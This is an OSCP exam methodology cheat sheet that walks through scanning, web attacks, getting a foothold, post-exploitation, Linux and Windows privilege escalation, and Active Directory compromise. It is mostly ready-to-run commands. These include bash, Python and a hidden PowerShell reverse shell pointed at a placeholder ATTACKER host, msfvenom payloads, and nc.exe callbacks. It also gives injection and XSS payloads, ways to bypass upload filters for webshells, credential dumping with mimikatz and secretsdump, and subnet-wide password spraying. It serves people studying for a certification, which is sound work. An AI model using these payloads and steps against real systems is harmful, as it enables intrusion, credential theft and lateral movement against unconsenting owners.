OSCP Methodology Checklist


Huge advice from OSCP mentors:

x
If a password contains " ! " :   it is neccesary to scape it with \ =  " \! "
Even using ' ' will cause issues with command executions and will not read the ! 

Always use "\!" when there is ! in passwords

example:

nxc smb 10.10.10.10 -u offsec -p "Password1\!"
==nxc smb 10.10.10.10 -u offsec -p 'Password1!'  will not work properly==

⚡ STUCK? Emergency Quick-Reference

SituationDo This
No foothold after 30 minRe-read nmap output. Google every version. Try default creds. Check UDP. Try POST on APIs. Check page source for hidden paths/comments.
Shell but can’t privescdir C:\ or Get-ChildItem C:\ or ls / for unusual dirs. netstat -ano / ss -tulnp for localhost services. Read every file in home dirs. Crack any protected files. Run pspy64 (Linux). Check PS history (Windows).
AD — stuck after initial credsGREP TRANSCRIPTS FIRST: smbclient //IP/share -c recurse ON; ls then grep ConvertTo-SecureString, PSCredential in .ps1/.txt/*.log. Read EVERY SMB share non-default first. Then BloodHound, Kerberoast/AS-REP, spray creds, ADCS, delegation.
Exploit not workingCheck architecture (32 vs 64). Read the code. Modify hardcoded IPs/ports/paths. Try cross-compiling. Check bad characters. Try nc.exe pattern instead of msfvenom exe.
Need to move onNever spend >2 hours stuck. Take a break, come back with fresh eyes. 70 points passes — you can skip one standalone.

PHASE 0 — Exam Setup (First 10 Minutes)

export ip=<TARGET_IP>
script -a /home/kali/oscp/exam_log_$(date +%F).txt

# Start your tools HTTP server NOW — run in a SEPARATE terminal tab
# so your working directory doesn't change:
python3 -m http.server 80 -d ~/Tools &
# ~/Tools should have: linpeas.sh, winpeas.exe, chisel, chisel.exe,
#   nc.exe, SharpHound.exe, PowerView.ps1, pspy64, GodPotato.exe, PrintSpoofer64.exe

# AD set — DNS and time sync
sudo ntpdate <DC_IP>
# Add ALL names from nmap (FQDN + domain + hostname) on ONE line:
echo "<DC_IP> dc.domain.local domain.local dc" | sudo tee -a /etc/hosts
# resolv.conf: keep 8.8.8.8 for internet. DC goes in /etc/hosts ONLY.
echo "nameserver 8.8.8.8" | sudo tee /etc/resolv.conf

Passing combos (70 pts to pass):

  • AD full (40) + 1 standalone full (20) + 1 standalone initial (10) = 70 PASS
  • AD partial (30) + 2 standalone full (40) = 70 PASS
  • AD full (40) + 2 standalone full (40) = 80 comfortable

AD has partial credit: 10 pts per workstation flag, 20 pts for DC.

Time management:

BlockTimeFocus
Hours 0–11 hrScan ALL machines. Let scans run. Read results. Plan attack order.
Hours 1–54 hrAD set (40 pts). BloodHound → Kerberoast → lateral → DC.
Hours 5–94 hrStandalone 1 and 2.
Hours 9–112 hrStandalone 3 or revisit stuck boxes.
Hours 11–121 hrStart screenshots + report notes while access is fresh.
Hours 12–164 hrContinue exploitation. Rotate between stuck boxes.
Hours 16+remainingClean up. Ensure all screenshots taken. Verify all proof flags.

Strategy: AD set first (40 points, most efficient). Never spend >2 hours stuck on one box. Every credential found → spray everywhere immediately.

Report reminders: Screenshot proof flags with whoami; hostname; ip a; cat proof.txt (Linux) or whoami; hostname; ipconfig; type C:\Users\Administrator\Desktop\proof.txt (Windows — use semicolons, not &&). Document every step — the report is pass/fail. Take screenshots AS you go, not after.


PHASE 1 — Enumeration

1a. Port Scanning (run all three simultaneously)

# Terminal 1: Fast all-port TCP
sudo nmap -Pn -p- --min-rate=1000 -T4 -oN fast_tcp.txt $ip

# Terminal 2: Top 20 UDP
sudo nmap -Pn -sU --top-ports=20 -oN udp_top20.txt $ip

# Terminal 3: Targeted scan (after fast scan finishes)
ports=$(grep '^[0-9]' fast_tcp.txt | cut -d '/' -f 1 | tr '\n' ',' | sed 's/,$//')
sudo nmap -A -Pn -sC -sV -p $ports -oA targeted $ip

# Vuln scan (run while you manually enumerate)
sudo nmap -sV -p $ports --script "vuln" $ip -oN vuln.txt

1b. Port-by-Port Commands

Work through every open port. Bold = most common foothold vectors.

PortQuick Commands
21 FTPftp $ip (anonymous:anonymous). If writable + overlaps web root → upload webshell
22 SSHNote version. Only brute-force with known username. ssh2john if you find a key
53 DNSdig AXFR @$ip <domain>, dnsrecon -d <domain> -n $ip -t std
80/443 HTTP→ Go to Phase 2 Web below
88 Kerberoskerbrute userenum -d DOMAIN --dc $ip users.txt
110/143 POP/IMAPtelnet $ip 110 — USER/PASS/LIST/RETR
111/2049 NFSshowmount -e $ip, mount and check for no_root_squash
135 MSRPCrpcclient -U "" -N $ip -c ’enumdomusers; netshareenumall'
139/445 SMBenum4linux-ng -A $ip, smbclient -L //$ip -N, smbmap -H $ip, nmap --script smb-vuln* -p 445 $ip. Download everything: smbclient //$ip/share -N -c 'recurse;prompt;mget *'
161 SNMPonesixtyone -c /usr/share/seclists/Discovery/SNMP/snmp.txt $ip, then snmpwalk -c <string> -v2c $ip. Windows OIDs: users 1.3.6.1.4.1.77.1.2.25, processes 1.3.6.1.2.1.25.4.2.1.2, software 1.3.6.1.2.1.25.6.3.1.2, TCP ports 1.3.6.1.2.1.6.13.1.3
389/636 LDAPldapsearch -x -H ldap://$ip -s base namingcontexts, then enumerate with creds
1433 MSSQLimpacket-mssqlclient sa:password@$ip, try xp_cmdshell
3306 MySQLmysql -h $ip -u root, try no password. Local via evil-winrm: .\mysql.exe -u root -e "SHOW DATABASES;" (-e avoids hanging)
5432 Postgrespsql -h $ip -U postgres, try COPY TO PROGRAM
5985/5986 WinRMevil-winrm -i $ip -u user -p pass (5986 = SSL: add -S)
6379 Redisredis-cli -h $ip — CONFIG GET dir, write webshell
3389 RDPxfreerdp /u:user /p:pass /v:$ip /cert:ignore +clipboard
8080/8443 Alt WebSame as 80/443. Check for Tomcat (try tomcat:s3cret at /manager), Jenkins (script console → Groovy shell), WebLogic
curl http://$ip:PORT/endpoint                # GET
curl -d "" -X POST http://$ip:PORT/endpoint  # POST (adds content-length)

PHASE 2 — Web Attacks

Step 1 — Recon (run in parallel)

feroxbuster -u http://$ip -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt -x php,txt,html,asp,aspx,jsp,bak -C 404 -t 50
gobuster dir -u http://$ip -w /usr/share/seclists/Discovery/Web-Content/quickhits.txt -t 50

# Check for cgi-bin (Shellshock!)
gobuster dir -u http://$ip/cgi-bin/ -w /usr/share/seclists/Discovery/Web-Content/common.txt -x sh,pl,cgi -t 50

# Virtual hosts (if domain name known)
ffuf -u http://$ip/ -H "Host: FUZZ.<domain>" -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -fs <default_size>

# Nikto (run in background — slow but finds things)
nikto -h http://$ip -o nikto.txt &

Always check manually: robots.txt, sitemap.xml, .git/HEAD, web.config, .env, page source (comments, JS files, hidden fields, version numbers)

Step 2 — CMS?

wpscan --url http://$ip --enumerate p --plugins-detection aggressive  # WordPress
droopescan scan drupal -u http://$ip      # Drupal

searchsploit <CMS> <version> for any CMS found

Step 3 — Default Creds

Try on every login: admin:admin, admin:password, admin:Password1, root:root, tomcat:s3cret

Step 4 — Test Parameters

For every input/parameter found:

AttackQuick Test
SQLi', ' OR 1=1-- -, time-based 1' WAITFOR DELAY '0:0:5'-- -
XSS<script>alert(1)</script>, "><img src=x onerror=alert(1)>
LFI../../../../etc/passwd, php://filter/convert.base64-encode/resource=index
Command injection; id, | id, $(id), backticks
SSTI${7*7}, {{7*7}}, <%= 7*7 %> — a rendered 49 means injectable

Step 5 — File Upload?

If you find any upload form:

  • Upload a webshell matching the stack (.php, .aspx, .jsp)
  • Bypass extension filters: double extension (shell.php.jpg), mixed case (.pHp), alternates (.phtml, .php5, .phar)
  • Bypass content-type checks: set Content-Type: image/png in Burp while keeping the malicious body
  • Prepend a valid magic header (e.g. GIF89a;) to pass image validation
  • Find where it lands (/uploads/, /files/) and browse to it to execute

PHASE 3 — Foothold

  1. Known exploitsearchsploit hit with matching version? Read code, modify, execute
  2. Default/weak creds — tried on every login, DB, management interface?
  3. Web exploitation — SQLi, LFI, upload, command injection found in Phase 2?
  4. Credential reuse — any cred found anywhere → try on SSH, WinRM, RDP, SMB, everything
  5. Brute force (last resort) — only with known username: hydra -l user -P rockyou.txt ssh://$ip -t 4

Reverse shell setup:

rlwrap nc -lvnp 443    # port 443 -- port 4444 is often blocked by firewalls
# Bash
bash -c 'bash -i >& /dev/tcp/ATTACKER/443 0>&1'
# Python (Linux)
python3 -c 'import socket,subprocess,os;s=socket.socket();s.connect(("ATTACKER",443));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])'
# PowerShell (Windows — when you can run commands but can't upload files yet)
powershell -nop -w hidden -c "$c=New-Object System.Net.Sockets.TCPClient('ATTACKER',443);$s=$c.GetStream();[byte[]]$b=0..65535|%{0};while(($i=$s.Read($b,0,$b.Length))-ne 0){$d=(New-Object Text.ASCIIEncoding).GetString($b,0,$i);$r=(iex $d 2>&1|Out-String);$t=$r+'PS '+(pwd).Path+'> ';$s.Write(([Text.Encoding]::ASCII.GetBytes($t)),0,$t.Length);$s.Flush()};$c.Close()" 
# msfvenom
# 64-bit (try first)
msfvenom -p linux/x64/shell_reverse_tcp LHOST=ATTACKER LPORT=443 -f elf -o shell.elf
msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKER LPORT=443 -f exe -o shell.exe
# 32-bit (if target is x86 — check with `file` on Linux or `systeminfo` on Windows)
msfvenom -p linux/x86/shell_reverse_tcp LHOST=ATTACKER LPORT=443 -f elf -o shell32.elf
msfvenom -p windows/shell_reverse_tcp LHOST=ATTACKER LPORT=443 -f exe -o shell32.exe

PHASE 4 — Post-Exploitation (immediately after EVERY shell)

Do ALL of these steps on EVERY machine you land on, every time. Not just the first one.

Step 1 — Stabilize your shell

Linux:

python3 -c 'import pty; pty.spawn("/bin/bash")'
# Ctrl+Z
stty raw -echo; fg
# Enter Enter
export TERM=xterm-256color
stty rows 50 cols 200

Windows (if you got a raw cmd.exe shell via nc.exe):

# Switch from cmd to PowerShell on the target:
powershell -ep bypass

# If shell keeps dying — use nc.exe for a new callback (already uploaded in Step 2b):
C:\Windows\Temp\nc.exe KALI_IP 443 -e cmd.exe
# Catch it on Kali in a different terminal: rlwrap nc -lvnp 443

Step 2 — Identify + screenshot

# Linux                        # Windows
whoami && id                   whoami /all
hostname                       hostname
ip a                           ipconfig /all

⚠️ Screenshot this immediately. On exam day you WILL forget later.

Step 2b — Upload tools TO target

Your HTTP file server should already be running from Phase 0. If not: cd ~/Tools && python3 -m http.server 80 &

# Upload to Linux target
wget http://KALI/linpeas.sh -O /tmp/linpeas.sh && chmod +x /tmp/linpeas.sh
wget http://KALI/chisel -O /tmp/chisel && chmod +x /tmp/chisel
wget http://KALI/pspy64 -O /tmp/pspy64 && chmod +x /tmp/pspy64
# Upload to Windows target
certutil -urlcache -f http://KALI/winpeas.exe C:\Windows\Temp\winpeas.exe
certutil -urlcache -f http://KALI/chisel.exe C:\Windows\Temp\chisel.exe
certutil -urlcache -f http://KALI/nc.exe C:\Windows\Temp\nc.exe
# Alt if certutil blocked:
powershell -c "iwr http://KALI/winpeas.exe -OutFile C:\Windows\Temp\winpeas.exe"
# Via evil-winrm (has built-in upload):
upload /home/kali/Tools/winpeas.exe C:\Windows\Temp\winpeas.exe

Download files FROM target to Kali (for winpeas results, loot, etc.):

# Option 1: evil-winrm built-in
*Evil-WinRM* PS> download C:\Windows\Temp\winpeas.txt .

# Option 2: SMB server on Kali (run in separate terminal)
impacket-smbserver smb $(pwd) -smb2support
# Then on target: copy C:\Windows\Temp\winpeas.txt \\KALI_IP\smb\winpeas.txt

Step 3 — Grab flags

cat /home/*/local.txt && cat /root/proof.txt 2>/dev/null          # Linux
Get-ChildItem -Path C:\Users -Recurse -Filter local.txt -ErrorAction SilentlyContinue | Get-Content   # Windows
Get-ChildItem -Path C:\Users -Recurse -Filter proof.txt -ErrorAction SilentlyContinue | Get-Content

Step 4 — Check for internal networks + hidden services

Run these on every machine you land on:

# LINUX                            # WINDOWS
ip a                               ipconfig /all
ip route                           route print
arp -a                             arp -a
ss -tulnp                          netstat -ano | findstr LISTENING

Read the output. Three things to look for:


A) Does this machine have TWO network interfaces?

Example: ip a shows eth0: 192.168.x.x AND eth1: 172.16.x.x

This means this machine can see an internal network that your Kali CANNOT reach. You need to tunnel through it.

Use Chisel for pivoting (see the tunneling section):

# Terminal on Kali — start Chisel server
./chisel server -p 9999 --reverse

# Chisel binary should already be on target from Step 2b.
# If not: download from your python3 HTTP server on port 80.

# On compromised machine — connect back
# Linux:
./chisel client KALI_IP:9999 R:socks 
# Windows:
.\chisel.exe client KALI_IP:9999 R:socks

# Edit /etc/proxychains4.conf on Kali — change last line to:
# socks5 127.0.0.1 1080

# Now ALL your Kali tools work through the tunnel:
proxychains -q nmap -sT -Pn -p 80,445,5985,3389 INTERNAL_IP
proxychains -q curl http://INTERNAL_IP
proxychains -q evil-winrm -i INTERNAL_IP -u USER -p PASS
proxychains -q smbclient -L //INTERNAL_IP -U USER

After the tunnel is up → go back to Phase 1 and enumerate the new subnet.


B) Is there a service listening on 127.0.0.1 (localhost only)?

Example: netstat -ano shows 127.0.0.1:8080 LISTENING

This service is only reachable from this machine. You need to forward that port to your Kali.

Use Chisel (same tool as scenario A — just different syntax):

# Chisel server should already be running from scenario A. If not:
# ./chisel server -p 9999 --reverse

# On target — chisel binary should already be there from Step 2b.
# TIP: You can combine SOCKS + port forward in one client connection:
# ./chisel client KALI_IP:9999 R:socks R:9090:127.0.0.1:8080
# Forward target's localhost:8080 to Kali's localhost:9090
.\chisel.exe client KALI_IP:9999 R:9090:127.0.0.1:8080
# Linux: ./chisel client KALI_IP:9999 R:9090:127.0.0.1:8080

# Step 3: On Kali — access the forwarded service
curl http://127.0.0.1:9090
# Or open in browser: http://127.0.0.1:9090

Chisel is a single binary you upload. No SSH or Socat needed on target. Forward multiple ports at once: R:9090:127.0.0.1:8080 R:9091:127.0.0.1:3306 Change 8080 and 9090 to whatever ports YOU found in netstat.

Common localhost services worth investigating: 80/8080 (web app), 1433 (MSSQL), 3306 (MySQL), 5432 (Postgres).

Before tunneling — try interacting directly from the target:

# MySQL (from C:\xampp\mysql\bin or wherever mysql.exe lives)
.\mysql.exe -u root --password=""
.\mysql.exe -u root -e "SHOW DATABASES;"
.\mysql.exe -u root -e "USE dbname; SELECT * FROM users;"
# ⚠️ Evil-WinRM hangs on interactive prompts — always use -e flag

# Identify what process owns an unknown port (no admin needed)
Get-Process -Id <PID> | Select-Object Name,Path
# Or map ALL ports at once:
Get-NetTCPConnection -State Listen | Select-Object LocalAddress,LocalPort,OwningProcess,@{Name='Process';Expression={(Get-Process -Id $_.OwningProcess).Name}} | Sort-Object LocalPort

C) Neither? Continue to Step 5.

Step 5 — Harvest credentials + Loot Filesystem + ADD TO CREDS TABLE

# Linux: bash history, config files, env vars, .git repos
cat ~/.bash_history
env | grep -i pass
find / -name ".git" -type d 2>/dev/null
grep -ri 'password' /var/www/ /opt/ /home/ 2>/dev/null

# Windows — commands that work in BOTH CMD and PS:
whoami /all
cmdkey /list
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"
netstat -ano | findstr LISTENING

# CMD-only (if your prompt is C:\>):
type C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
type C:\inetpub\wwwroot\web.config 2>nul
type C:\Windows\Panther\unattend.xml 2>nul

# PS-only (if your prompt is PS C:\>):
Get-Content $env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt -EA SilentlyContinue
Get-Content C:\inetpub\wwwroot\web.config -EA SilentlyContinue
Get-Content C:\Windows\Panther\unattend.xml -EA SilentlyContinue
Get-ChildItem -Path C:\ -Recurse -Filter *.kdbx -EA SilentlyContinue | Select FullName

# Hidden AppData — PS only (dir WON'T show this folder, WinPEAS MISSES it):
Get-ChildItem -Path C:\Users\*\AppData -Recurse -Include *.xml,*.config,*.ini,*.txt,*.settings -Force -EA SilentlyContinue | Select-String -Pattern "password|credential|passwd" -List | Select Path
# Then read whatever it finds: Get-Content "<PATH>" -EA SilentlyContinue
# Windows: Check local databases for creds (if MySQL/MSSQL found in Step 4)
.\mysql.exe -u root -e "SHOW DATABASES;"
# Then dump every non-default database:
.\mysql.exe -u root -e "USE creds; SHOW TABLES;"
.\mysql.exe -u root -e "USE creds; SELECT * FROM users;"
.\mysql.exe -u root -e "USE wordpress; SELECT user_login,user_pass FROM wp_users;"

⚠️ EVERY credential found → update your creds table → spray EVERYWHERE immediately.

# Create files with ALL creds found so far
echo -e "administrator\ncharlotte\njohn" > users.txt
echo -e "Password1\nFound_Pass2" > passes.txt

# Spray ALL users x ALL passwords x ALL services x ALL IPs
nxc smb <SUBNET>/24 -u users.txt -p passes.txt --continue-on-success
nxc winrm <SUBNET>/24 -u users.txt -p passes.txt --continue-on-success
nxc rdp <SUBNET>/24 -u users.txt -p passes.txt --continue-on-success
nxc mssql <SUBNET>/24 -u users.txt -p passes.txt --continue-on-success

This single habit — spray every cred the moment you find it across every service — is how chains get built.

Step 6 — Privesc

Phase 5 (Linux) or Phase 6 (Windows)

Step 7 — AFTER getting root/admin (do this EVERY time)

# 1. Screenshot proof (all 4 in one shot — DO NOT SKIP)
# Linux:  whoami && hostname && ip a && cat /root/proof.txt
# Windows: whoami; hostname; ipconfig; type C:\Users\Administrator\Desktop\proof.txt

# 2. Dump all credentials (memory + registry)
# From Kali: impacket-secretsdump 'DOMAIN/USER:PASS'@TARGET_IP
# On Windows: mimikatz "privilege::debug" "sekurlsa::logonpasswords" "exit"
# On Linux: cat /etc/shadow

# Run the 8-check checklist. This catches creds that mimikatz/secretsdump MISS:
# log files with hashes, text files with plaintext creds, SSH keys, backup files, web configs

# 4. Check for internal networks AGAIN (root may see new interfaces)
# ip a / ipconfig /all — re-run Step 4

# 5. SPRAY all new creds immediately
nxc smb ALL_IPS -u 'NEW_USER' -p 'NEW_PASS' --continue-on-success

PHASE 5 — Linux Privilege Escalation

Run checks in this order. First three catch ~80% of vectors.

#CheckCommandIf Found
1sudo -lsudo -lGTFOBins
2SUIDfind / -perm -u=s -type f 2>/dev/null→ GTFOBins
3Cron/timerscat /etc/crontab && ls -la /etc/cron.d/ + run pspy64Writable script? PATH hijack?
4Capabilitiesgetcap -r / 2>/dev/nullcap_setuid = instant root
5LinPEAS./linpeas.sh then review outputCheck RED/YELLOW items
6Passwordsgrep -ri 'password' /var/www/ /opt/ /home/ + bash_historyCredential reuse
7SSH keysfind / -name id_rsa 2>/dev/nullSSH as other user
8Writable /etc/passwdls -la /etc/passwdAdd root user
9Internal servicesss -tulnpLocalhost-only = forward with Chisel → Phase 4 Step 4B
10NFS no_root_squashcat /etc/exportsMount + SUID bash
11Docker/LXD groupidContainer escape
12Kernel (LAST RESORT)uname -a + linux-exploit-suggesterPwnKit, DirtyPipe

PHASE 6 — Windows Privilege Escalation

⚠️ Which shell are you in? Check your prompt: C:\> = CMD. PS C:\> = PowerShell. Commands below work in both unless labeled. Switch anytime: type cmd for CMD, powershell -ep bypass for PS.

#CheckCommand (works in both)If Found
2WinPEAS.\winpeas.exe cmd | Tee-Object -FilePath .\winpeas.txt (PS) or .\winpeas.exe cmd > winpeas.txt (CMD)Check RED/YELLOW highlights
3Service misconfigwmic service get name,pathname,startmodeUnquoted path or writable binary → sc config
4Saved credscmdkey /listEntries found → runas /savecred
5PS historyCMD: type C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt / PS: Get-Content $env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt -EA SilentlyContinueCredential reuse
6AlwaysInstallElevatedreg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevatedmsfvenom MSI
7SAM/SYSTEM backupsCMD: dir C:\Windows\Repair\SAM / PS: Get-ChildItem C:\Windows\Repair\SAM -EA SilentlyContinuesecretsdump
8Scheduled tasksschtasks /query /fo LIST /vWritable script?
10DLL hijackingCMD: echo %PATH% / PS: $env:PATH -split ';'Writable dir in PATH → plant DLL
11Internal servicesnetstat -ano | findstr LISTENINGInteract directly first (MySQL -e, curl) → tunnel with Chisel if needed → Phase 4 Step 4B
12UAC bypasswhoami /groupsMedium Mandatory + admin → fodhelper

Also run:

  • CMD: findstr /si "password" *.txt *.xml *.ini *.config (from user home, not C:\)
  • PS: Get-ChildItem -Recurse -Include *.txt,*.xml,*.ini,*.config -EA SilentlyContinue | Select-String "password" -List | Select Path
  • Both: reg query HKLM /f password /t REG_SZ /s

Potato attack quick reference:

OSTool
Server 2016 and olderJuicyPotato
Server 2019+ / Win10 1809+PrintSpoofer
UniversalGodPotato or SigmaPotato
PrintSpoofer.exe -i -c cmd
GodPotato-NET4.exe -cmd "C:\Windows\Temp\nc.exe ATTACKER 443 -e cmd.exe"

How to Read WinPEAS / LinPEAS Output (don’t read the whole thing)

PEAS output is thousands of lines. You don’t read it all. You search for specific sections.

LinPEAS — check these sections in order:

# Save output to file first
./linpeas.sh | tee linpeas.txt
==
# Then search for what matters:
grep -A5 '\[1\]' linpeas.txt                    # RED/YELLOW findings (highest priority)
grep -A3 'sudo -l' linpeas.txt                    # sudo permissions
grep -B2 -A2 'SUID' linpeas.txt                   # SUID binaries
grep -B2 -A5 'Cron' linpeas.txt                    # cron jobs
grep -A3 'Capabilities' linpeas.txt                # file capabilities
grep -B2 -A5 'password\|credential' linpeas.txt   # passwords in files
grep -A3 'writable' linpeas.txt                    # writable files/dirs
grep -A5 'docker\|lxd' linpeas.txt                # container escapes
grep -A3 '127.0.0.1' linpeas.txt                  # localhost-only services
.\winPEASx64.exe cmd | Tee-Object -FilePath .\winpeas.txt

Color guide: RED/YELLOW = almost certainly exploitable. RED = critical finding. GREEN = interesting info.

WinPEAS — check these sections in order:

# Save output to file (redirect because colors make it unreadable in terminal)
.\winpeas.exe cmd > C:\Windows\Temp\winpeas.txt

# Download to Kali (SMB server or evil-winrm download)
# Then search:
grep -A5 'Password\|credential\|AutoLogon' winpeas.txt
grep -A5 'SeImpersonate\|SeBackup\|SeDebug\|SeRestore' winpeas.txt
grep -A5 'Unquoted\|Modifiable' winpeas.txt        # service misconfigs
grep -A5 'AlwaysInstallElevated' winpeas.txt
grep -A5 'PSReadLine\|ConsoleHost_history' winpeas.txt
grep -A5 'Unattend\|web.config\|SiteList' winpeas.txt
grep -B2 -A5 '127.0.0.1' winpeas.txt              # localhost services
grep -A3 'Backup Operators\|Server Operators\|DnsAdmins' winpeas.txt

Shortcut: Run winpeas.exe cmd not just winpeas.exe — the cmd flag gives cleaner output without ANSI colors that break file redirection.

⚠️ Don’t spend 30 minutes reading PEAS output top-to-bottom. Grep for the sections above, check RED/YELLOW items, move on.


PHASE 7 — Active Directory (Assumed Breach)

The AD Chain (memorize this)

1. Given creds  BloodHound + netexec enum (Playbook Phase 1)
2. Kerberoast + AS-REP roast  crack  spray (Phase 2)
3. Check BloodHound: ACL edges? ADCS? Delegation? (Phase 3-4)
4. Every machine you get admin on  secretsdump  spray new hashes (Phase 5-6)
5. Repeat steps 2-4 with every new credential
6. DA  DCSync  PtH to DC  proof.txt (Phase 9)

AD-Specific Reminders

  • BloodHound first, always. Before any attack, run collection + check shortest paths.
  • Credential table is everything. Update it after every secretsdump, every crack, every config file. Spray immediately.
  • Check sessions: BloodHound custom query MATCH p=(c:Computer)-[:HasSession]->(m:User) RETURN p — tells you where high-value users are logged in.
  • Stuck? Re-run BloodHound queries. Read EVERY SMB share. Check ADCS. Kerberoast again with new users. Spray every password variant.

NeedPage
Per-service enumerationEnumeration
Web app testingWeb Attacks · SQL Injection
Getting a shell / file transfersShells & File Transfers
Linux privescLinux Privilege Escalation
Windows privescWindows Privilege Escalation
Active DirectoryAD Playbook · AD Tools
PivotingPivoting & Tunneling · Ligolo-ng
Cracking hashesHash Types · Password Attacks
Buffer overflowBuffer Overflows
Writing the reportReport Writing